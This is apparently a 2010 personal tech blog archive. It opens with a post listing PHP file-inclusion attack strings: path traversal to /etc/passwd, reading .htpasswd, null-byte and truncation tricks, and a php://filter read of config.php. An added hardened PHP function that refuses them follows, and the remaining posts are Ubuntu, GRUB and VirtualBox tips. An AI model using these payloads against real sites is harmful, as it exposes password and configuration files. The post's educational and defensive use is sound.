Friday 19 November 2010

Variations for exploiting the File Inclusion vulnerability

This post lists some of the ways that I've learnt to exploit the file inclusion vulnerability. I'm quite sure that there are many more variations and modifications for exploiting file inclusion, so if you have any, feel free to comment here.

Before reading this post, you might want to read my earlier articles on the topic:
LFI tutorial
RFI tutorial
-> A sample vulnerable piece of code would be something like below: test.php
<?php
include("incs/".$_GET['page']);
?>

-> including file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd

-> path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd

-> Nullbyte injection
test.php?page=../../../../../etc/passwd

-> Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off
test.php?page=../../../../home/

-> PHP stream/wrappers inclusion
test.php?page=php://filter/convert.base64-encode/resource=config.php

-> Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …

I'll update it more and more when I get to know other variations on exploiting the file inclusion vulnerabilities.
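
Added example, not part of the original post: a hardened replacement for the include in test.php that refuses each of the request variations listed above. The function name `resolve_page`, the rule that pages are plain names with a `.php` suffix, and the throwaway demo directory are assumptions made for illustration.

```php
<?php
// Added example: resolve a requested page to a file inside the include
// directory, or return null when the request must be refused.
function resolve_page(string $page, string $baseDir): ?string
{
    // Accept plain names only. This alone rejects slashes, dots, backslashes,
    // null bytes and stream wrappers such as php://filter.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $page . '.php');
    if ($base === false || $path === false) {
        return null; // directory missing or no such page
    }
    // realpath() has resolved symlinks and "..", so the result must still
    // start with the include directory followed by a separator.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo: a temporary include directory holding one page, and the
// request values from this post (the null byte sample is constructed).
$dir = sys_get_temp_dir() . '/incs_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/home.php', "<?php echo 'home';");
$requests = [
    'home',
    '.htaccess',
    '.htpasswd',
    '../../../../../../../../../etc/passwd',
    "../../../../../etc/passwd\0",
    'php://filter/convert.base64-encode/resource=config.php',
    '../../../../../../etc/passwd.\.\.\.',
];
foreach ($requests as $r) {
    $path = resolve_page($r, $dir);
    printf("%-58s %s\n", addcslashes($r, "\0"), $path === null ? 'refused' : 'include ' . basename($path));
}
unlink($dir . '/home.php');
rmdir($dir);

// Usage in test.php (sketch):
//   $path = resolve_page($_GET['page'] ?? '', __DIR__ . '/incs');
//   if ($path === null) { http_response_code(404); exit; }
//   include $path;
```

Only the first request resolves to a file; every other value is refused before it reaches include().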


Updating|Upgrading ubuntu via terminal

While you might mostly be using the GUI update manager (System -> Administration -> Update Manager), you might also be interested to know how to update your Ubuntu from the terminal.

Open your terminal and enter the following two commands to update Ubuntu from the terminal.

sudo apt-get update

sudo apt-get upgrade

Isn't that as easy as using the GUI update manager? Hope it helps.


Thursday 18 November 2010

Converting dynamic disk to basic with diskpart

For some reason I had to convert my virtual hard disk from dynamic to basic type and the Disk Management GUI didn't allow me to do so. So here I am going to show you how to accomplish this task from the command line with diskpart.exe.

First delete all the volumes on the disk from the Disk Management GUI tool (type diskmgmt.msc in Run). Deleting a volume erases its data, so back up anything you need first.

You'll have to follow the following steps in order to convert the disk type:
- type diskpart in the command prompt
- to view the available disk, type list disk
- now select your target disk, type select disk n where n = ID of the disk
- finally type convert basic to have your disk converted to the basic type.

Hope it will be useful sometimes.


Tuesday 9 November 2010

Speeding up software installation in ubuntu with apt-fast

By default, we use apt-get to install applications in Linux, but it is not always that good in terms of download speed. So apt-fast.sh has come as an open source alternative for this purpose.

The apt-fast script from mattparnell.com is a little shell script that increases the speed of apt-get by many times. You need to have the axel download accelerator installed, which is a simple, short process, but everything else is extremely straightforward.

So, you'll have to first install the axel download accelerator either from the ubuntu software center or by doing as below:

sudo apt-get install axel

After installing axel, just download the apt-fast shell script from HERE. The script will run as root, so read through it before installing. After downloading the shell script, just do the following and you are done.

sudo cp $HOME/Downloads/apt-fast.sh /usr/bin/apt-fast
sudo chmod +x /usr/bin/apt-fast

Now you can use apt-fast from the terminal to install and update the packages installed under your ubuntu installation. Hope this helps to improve your speed. :)


Changing the default GRUB2 boot order

In order to change the way GRUB works, you need to edit the GRUB configuration file which is located at /etc/default/grub. Here, I'll post the way to change the default boot order of the GRUB2.

In order to edit the GRUB configuration file, enter the following command in the terminal:

sudo gedit /etc/default/grub

Its content will look like below:
# If you change this file, run 'update-grub' afterwards to update
# /boot/grub/grub.cfg.

GRUB_DEFAULT=0
#GRUB_HIDDEN_TIMEOUT=0
GRUB_HIDDEN_TIMEOUT_QUIET=true
GRUB_TIMEOUT=10
GRUB_DISTRIBUTOR=`lsb_release -i -s 2> /dev/null || echo Debian`
GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"
GRUB_CMDLINE_LINUX=""

# Uncomment to disable graphical terminal (grub-pc only)
#GRUB_TERMINAL=console

# The resolution used on graphical terminal
# note that you can use only modes which your graphic card supports via VBE
# you can see them in real GRUB with the command `vbeinfo'
#GRUB_GFXMODE=640x480

# Uncomment if you don't want GRUB to pass "root=UUID=xxx" parameter to Linux
#GRUB_DISABLE_LINUX_UUID=true

# Uncomment to disable generation of recovery mode menu entries
#GRUB_DISABLE_LINUX_RECOVERY="true"

# Uncomment to get a beep at grub start
#GRUB_INIT_TUNE="480 440 1"

You need to change the value of the GRUB_DEFAULT parameter in order to change the default boot entry of GRUB.

Entries are counted from 0, and 0 is the first and default entry. So, let's say another OS like Windows 7 is in the 5th position of the boot order: you would change GRUB_DEFAULT=0 to GRUB_DEFAULT=4.

Now with the change in the GRUB, you need to update grub by issuing the following command in terminal:
sudo update-grub

Hope this helps you. :)



Monday 8 November 2010

Password protecting the mounting of NTFS drives in Ubuntu

You might want to password protect the mounting process of the NTFS drives in your ubuntu OS for the purpose of privacy...

Enabling password protection is not hard. Just follow these instructions:

- Open the terminal and type:

sudo gedit /var/lib/polkit-1/localauthority/10-vendor.d/com.ubuntu.desktop.pkla

- Comment out the first four lines, i.e. all the lines above the line [Change CPU Frequency scaling], up to the line ResultActive=yes, by adding # at the beginning of each line.

- Now save the file and whenever you try to mount the NTFS drives under ubuntu, it will prompt you for the password.


Accessing shared folders of host system from Backtrack4(virtual)

As the title of the post says, this post will help you to access the shared folders. The example is based on Backtrack 4 installed as a virtual OS with VirtualBox OSE under ubuntu 10.10, but there should be no problem on other systems too as long as the virtual OS is Linux-based.

From the VirtualBox menu, Device->Shared Folders, you can add, edit and remove the shared folders that are shared by the host OS with the virtual OS.

Now onto the main problem: just enter the following command in order to successfully access the shared folders from within BT4, where share_name is the name of the shared folder as listed in the Shared Folders dialog.

mount -t vboxsf share_name /mnt

For example, if I share the folder $HOME/Desktop, I would do following in the BT4 konsole.

mount -t vboxsf Desktop /mnt

Note that if the windows system is the host OS, then I think you should include your shared folders as the Transient folder (anyone to make sure of this?) instead of the Machine Folders.
That's all. I hope this helps you.


Installing VirtualBox Addition in Backtrack 4 Final

I run ubuntu linux and Win XP and BT4 in the virtual environment using VirtualBox OSE. There was no problem installing VirtualBox Guest Addition in XP; however, I had a problem installing it in Backtrack 4, so I tried a few things and finally managed to solve it. And I thought to share it with you as it might help you as well.

Just enter the following commands one after another in the terminal (konsole in BT 4) and you're done.

- mkdir /vboxguest

- mount /dev/hdc /vboxguest

- cd /vboxguest

- ./VBoxLinuxAdditions-x86.run

- reboot

After the reboot, you'll see the VirtualBox Guest Addition working properly for your BT4 installation. Hope this helps.

